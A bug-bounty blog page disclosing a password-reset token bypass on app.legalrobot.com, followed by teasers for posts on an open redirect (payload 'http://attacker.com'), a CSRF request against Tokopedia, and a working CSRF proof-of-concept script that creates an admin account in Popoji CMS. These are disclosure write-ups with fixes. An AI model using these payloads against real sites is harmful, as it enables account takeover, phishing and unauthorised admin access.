Password Reset Token Issue [app.legalrobot.com]


Password Reset Token Issue [app.legalrobot.com]

Summary

Can still change password without token

Step to Reproduce

  • Request for password reset link.
  • Go to email and click on password reset link https://app.legalrobot.com/password-reset/token?v=uWe_yFJS0-N9fIk0nG0b0NZ70lkwNNi7RdUZu0KhiaX
  • Now remove the token and use the link https://app.legalrobot.com/password-reset
  • Observe that able to reset the password without the token.

Fix :

Always password reset link should work with a valid token.

Reference :

https://hackerone.com/reports/253934

At first time my report got N/A and I explain little bit and get bounty 20$ yay, you can see my original report on https://hackerone.com/reports/265775

Thanks,

Comments

Post a Comment

Popular posts from this blog

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.cod...
Read more

Tokopedia - CSRF On Open Store

Image
CSRF Issue On Tokopedia,  List of bug on Tokopedia : - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html Halo, Saya menemukan sebuah bug CSRF di tokopedia Pendahuluan bug ini bisa mengubah user picture di login seal Vuln Request: POST /ajax/shop/shop-status.pl?action=event_re_open HTTP/1.1 Host: www.tokopedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 33 Origin: null Cookie: Some Cookie Connection: close action=event_re_open&s_id=[id toko]...
Read more

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th...
Read more